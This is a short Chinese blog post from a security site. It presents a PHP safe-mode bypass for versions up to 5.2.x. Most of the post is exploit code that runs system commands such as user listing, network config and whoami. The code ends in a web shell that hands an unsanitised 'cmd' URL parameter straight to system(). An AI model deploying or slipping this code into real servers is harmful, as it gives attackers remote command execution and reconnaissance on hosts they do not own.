绕过PHP5.2.X的安全模式

php版本小于等于5.2.*

<?php
        //Exploit Code 
        system('\dir');
        system('\net user');
        print passthru ('\ipconfig');
        exec('\whoami',$a);
        print_r($a);
        //Shell Script
        //shell.php?cmd=net user
        $cmd = '\\'.$_GET['cmd'];
        system($cmd);
?>

本文固定链接: https://www.unhonker.com/bug/1932.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2016年05月13日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 绕过PHP5.2.X的安全模式 | 90' s Blog|关注网络信息安全
关键字:

绕过PHP5.2.X的安全模式:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!